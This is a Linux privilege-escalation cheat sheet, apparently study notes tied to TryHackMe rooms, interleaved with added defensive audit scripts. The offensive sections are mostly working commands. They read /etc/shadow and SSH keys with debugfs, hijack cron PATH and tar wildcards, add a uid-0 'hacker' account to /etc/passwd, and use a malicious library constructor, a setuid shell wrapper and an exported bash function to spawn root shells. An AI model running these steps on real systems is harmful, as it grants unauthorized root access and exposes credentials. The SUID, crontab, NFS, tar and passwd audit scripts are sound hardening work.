Privilege Escalation
PrivEsc: Exploits
- Identify the kernel version
- Search and find an exploit code for the kernel version of the target system
- Run the exploit
PrivEsc: Sudo
sudo -l
- https://gtfobins.github.io/
- Leverage LD_PRELOAD
- You can run a script as another user:
sudo -u <user-name> /opt/script/script.sh
PrivEsc: root
PrivEsc: Pass
- check /etc/passwd - for passwords
- check history files - for passwords
- check /var/backups/ - for passwords
- check each home dir - for passwords
PrivEsc: SUID
If the SUID bit is set, the binary runs with the permissions of the file owner; check https://gtfobins.github.io/
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
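An added defender-side example, not part of the original notes: instead of listing every SUID file by hand, keep a baseline of the setuid/setgid files a freshly installed system has and diff the live list against it, so custom SUID binaries like the ones the later "Hijack" sections start from show up as findings. The function names and the constructed temporary tree are mine; on a real host run the audit with the tree set to / and a baseline captured at install time.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: audit the setuid/setgid
# files under a directory tree against a known-good baseline and report
# anything that is not in it. The demo builds a constructed tree in a
# temporary directory so the script runs offline.

# Print every setuid or setgid regular file under tree $1, sorted.
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print the setuid/setgid files under tree $1 that do not appear in the
# baseline file $2 (one absolute path per line). Always returns 0 so the
# output can be captured or piped into an alerting step.
unexpected_suid() {
    comm -13 <(sort "$2") <(list_suid "$1")
    return 0
}

# Demo on a constructed tree: two "known" setuid files and one rogue binary
# (the name is the one used in the notes; the file here is empty).
demo=$(mktemp -d)
mkdir -p "$demo/usr/bin" "$demo/usr/local/bin"
touch "$demo/usr/bin/passwd" "$demo/usr/bin/su" "$demo/usr/local/bin/suid-so"
chmod 4755 "$demo/usr/bin/passwd" "$demo/usr/bin/su" "$demo/usr/local/bin/suid-so"
printf '%s\n' "$demo/usr/bin/passwd" "$demo/usr/bin/su" > "$demo/baseline.txt"
unexpected_suid "$demo" "$demo/baseline.txt"   # prints only .../usr/local/bin/suid-so
rm -rf "$demo"
```

Run the audit from cron or a configuration-management check and alert on any output; an empty result means the SUID set matches the baseline.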
PrivEsc: Capabilities
check https://gtfobins.github.io/
PrivEsc: Interesting groups
Disk Group
This privilege is almost equivalent to root access as you can access all the data inside of the machine.
df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Other
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe
PrivEsc: Ld_preload
sudo -l
- http://michalszalkowski.com/security/linux/leverage-ld-preload/
PrivEsc: Cron - Overwrite script
- Check the permissions of the script that cron executes; if you can overwrite it, you win
PrivEsc: Cron - Overwrite path
Check the cron configuration and pay attention to PATH
- PATH starts with /home/user
cat /etc/crontab
#-> PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin <--
#-> * * * * * root script.sh <-
Check the location of script.sh
- the script is located in /usr/local/bin/
- that means if you place a script.sh in a directory earlier in PATH, it will be executed instead of the original
Create a new script.sh in /home/user
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/script.sh
chmod +x /home/user/script.sh
Wait for the cron job
PrivEsc: PATH
- What folders are located under $PATH
- Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
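An added defender-side example covering both the "Cron - Overwrite path" and "PATH" sections above, not part of the original notes: a crontab audit that reports PATH directories an unprivileged user can write to and jobs whose command is given without an absolute path (exactly the combination that lets a planted script.sh win). The function names and the constructed crontab are mine; on a real host run `audit_crontab /etc/crontab` and repeat for the files under /etc/cron.d.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: audit a system crontab for
# a PATH entry writable by the user running the audit (or by anyone) and for
# job commands that cron must resolve through that PATH. The demo uses a
# constructed crontab and directories in a temp location so it runs offline.

# Print every directory in the colon-separated PATH $1 that is owner-writable
# and owned by the user running this audit, or that is world-writable. Mode
# bits are checked rather than access(), so results do not change when the
# audit runs as root.
writable_path_dirs() {
    local IFS=':' dir owner
    owner=$(id -un)
    for dir in $1; do
        [ -d "$dir" ] || continue
        if [ -n "$(find "$dir" -maxdepth 0 \( -user "$owner" -perm -u+w -o -perm -o+w \) 2>/dev/null)" ]; then
            echo "$dir"
        fi
    done
    return 0
}

# Print "<user> <command>" for each job in crontab file $1 whose command is
# not an absolute path. Variable assignments, comments and blank lines are
# skipped; @reboot-style lines are handled. read does no glob expansion, so
# the "*" fields stay literal.
relative_cron_commands() {
    local min hour dom mon dow user cmd rest
    while read -r min hour dom mon dow user cmd rest; do
        case "$min" in ''|'#'*|*=*) continue ;; esac
        case "$min" in @*) user=$hour; cmd=$dom ;; esac
        [ -n "$cmd" ] || continue
        case "$cmd" in /*) ;; *) echo "$user $cmd" ;; esac
    done < "$1"
    return 0
}

# Full report for crontab file $1: the effective PATH, writable PATH
# directories, and commands resolved through PATH.
audit_crontab() {
    local path
    path=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
    echo "PATH: ${path:-(not set)}"
    writable_path_dirs "$path" | sed 's/^/writable PATH dir: /'
    relative_cron_commands "$1" | sed 's/^/relative command: /'
}

# Demo: constructed layout mirroring the notes, a user-writable directory
# listed first in PATH and a job that names script.sh without a path.
demo=$(mktemp -d)
mkdir -p "$demo/home/user" "$demo/usr/local/bin"
chmod 755 "$demo/home/user"
chmod 555 "$demo/usr/local/bin"
printf 'PATH=%s:%s\n* * * * * root script.sh\n0 3 * * * root /usr/local/bin/backup.sh\n' \
    "$demo/home/user" "$demo/usr/local/bin" > "$demo/crontab"
audit_crontab "$demo/crontab"   # reports .../home/user as writable and "root script.sh"
chmod 755 "$demo/usr/local/bin"; rm -rf "$demo"
```

The fix on the cron side is the same in both cases: give every job an absolute command path and keep PATH in /etc/crontab limited to root-owned, non-writable directories.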
PrivEsc: TAR
echo 'cp /bin/bash /tmp/bash' > runme.sh
echo 'chmod +s /tmp/bash' >> runme.sh
echo "" > "--checkpoint-action=exec=sh runme.sh"
echo "" > --checkpoint=1
chmod +x runme.sh
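An added example from the hardening side, not part of the original notes: the trick above works only because a bare `*` lets the shell hand file names to tar as arguments, so the fix is to archive the directory by name rather than its contents. The function names and the constructed directory with two option-looking file names are mine.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: option_looking_names()
# counts the entries a bare `*` would pass as option-looking arguments;
# safe_archive() names the directory instead of its contents, so tar
# receives every member name as data. The demo builds a constructed
# directory in a temp location.

# Count the names in directory $1 that begin with "-" (these would be
# parsed as options if the directory were archived with `tar -cf out.tar *`).
option_looking_names() {
    local n=0 f
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        case "${f##*/}" in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
}

# Hardened form: archive directory $1 into $2 by changing into it and naming
# "." so no member name is ever a tar argument. Use `tar -cf out.tar -C dir .`
# in backup jobs instead of `cd dir && tar -cf out.tar *`.
safe_archive() {
    tar -cf "$2" -C "$1" .
}

# Print the archive member matching file name $2 inside archive $1, which
# shows the hostile name was stored as an ordinary file. Always returns 0.
archived_member() {
    tar -tf "$1" | grep -Fx -- "./$2" || true
}

demo=$(mktemp -d)
mkdir "$demo/data"
: > "$demo/data/report.txt"
: > "$demo/data/--checkpoint=1"
: > "$demo/data/-rf"
option_looking_names "$demo/data"                    # 2
safe_archive "$demo/data" "$demo/backup.tar"
archived_member "$demo/backup.tar" "--checkpoint=1"  # ./--checkpoint=1
rm -rf "$demo"
```

If a job must filter which files go in, feed names to tar through `find ... -print0 | tar --null -T -` rather than a glob; with either form, names beginning with "-" are just names.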
PrivEsc: NFS
- run
- check if any share has no_root_squash
- if yes, mount that share
- create nfs.c in that share
- compile
- go to the target machine and execute nfs
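An added defender-side example, not part of the original notes: a parser for /etc/exports that flags every client entry carrying no_root_squash and prints the corrected file with root_squash in its place. The function names and the constructed exports file are mine; on the NFS server run `audit_exports /etc/exports`, review the output of `squash_root`, then install it and reload with `exportfs -ra`.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: flag no_root_squash entries
# in an exports file and produce the corrected configuration. The demo uses
# a constructed exports file written to a temp location.

# Print "<path> <client>" for each entry in exports file $1 whose option
# list contains no_root_squash. Lines look like
#   /path client1(opt,opt) client2(opt)
# Blank lines and comments are ignored. Always returns 0.
audit_exports() {
    local path rest entry client opts entries
    while read -r path rest; do
        case "$path" in ''|'#'*) continue ;; esac
        read -ra entries <<< "$rest"          # split into tokens, no glob expansion
        for entry in "${entries[@]}"; do
            client=${entry%%\(*}              # text before "(" is the client
            opts=${entry#*\(}; opts=${opts%\)} # text inside "(...)" is the option list
            case ",$opts," in
                *,no_root_squash,*) echo "$path ${client:-*}" ;;
            esac
        done
    done < "$1"
    return 0
}

# Print exports file $1 with every no_root_squash replaced by root_squash,
# which is the default and maps remote uid 0 to nobody.
squash_root() {
    sed 's/no_root_squash/root_squash/g' "$1"
}

demo=$(mktemp -d)
cat > "$demo/exports" <<'EOF'
# constructed sample: the first and third shares let a remote root stay root
/srv/share     *(rw,sync,no_root_squash,no_subtree_check)
/srv/public    10.0.0.0/24(ro,sync)
/home/backup   10.0.0.5(rw,sync,no_root_squash) 10.0.0.6(rw,sync,root_squash)
EOF
audit_exports "$demo/exports"            # /srv/share *  and  /home/backup 10.0.0.5
squash_root "$demo/exports" > "$demo/exports.fixed"
audit_exports "$demo/exports.fixed"      # prints nothing
rm -rf "$demo"
```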
PrivEsc: Writable files
/etc/passwd
Generate a password hash with one of the following commands.
openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
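An added defender-side example, not part of the original notes: a check for the traces the lines above leave in /etc/passwd, a second UID-0 account and a hash stored directly in the password field instead of "x" (which marks the hash as living in /etc/shadow), plus a test for whether the file is writable by group or other. The function name and the constructed passwd file are mine; the sample line inside it is the one from the notes above.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: audit a passwd-format file
# for extra uid-0 accounts, hashes stored outside shadow, and loose file
# permissions. Run `audit_passwd /etc/passwd`; the demo uses a constructed
# file in a temp location.

# Print one finding per line for passwd file $1. Always returns 0.
audit_passwd() {
    local file=$1 name pw uid gid gecos home shell
    if [ -n "$(find "$file" -maxdepth 0 \( -perm -g+w -o -perm -o+w \) 2>/dev/null)" ]; then
        echo "file writable by group or other: $file"
    fi
    while IFS=: read -r name pw uid gid gecos home shell; do
        [ -n "$name" ] || continue
        if [ "$uid" = 0 ] && [ "$name" != root ]; then
            echo "extra uid-0 account: $name (shell $shell)"
        fi
        case "$pw" in
            x|'*'|'!'|'!!'|'') ;;            # shadowed or locked, as expected
            *) echo "hash stored in passwd instead of shadow: $name" ;;
        esac
    done < "$file"
    return 0
}

demo=$(mktemp -d)
cat > "$demo/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
EOF
chmod 666 "$demo/passwd"       # simulate the writable-file condition
audit_passwd "$demo/passwd"
# file writable by group or other: .../passwd
# extra uid-0 account: hacker (shell /bin/bash)
# hash stored in passwd instead of shadow: hacker
rm -rf "$demo"
```

On a real system /etc/passwd should be mode 644 and root-owned, and every line should have exactly one uid-0 entry (root) with "x" in the password field.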
PrivEsc: Hijack shared library
find all binaries with SUID set
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY) = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo ' system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
PrivEsc: Hijack service
find all binaries with SUID set
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start <- -------------------------- TARGET
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
PrivEsc: Hijack service path
find all binaries with SUID set
find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
Links
- https://tryhackme.com/room/linprivesc
- https://tryhackme.com/room/linuxprivescarena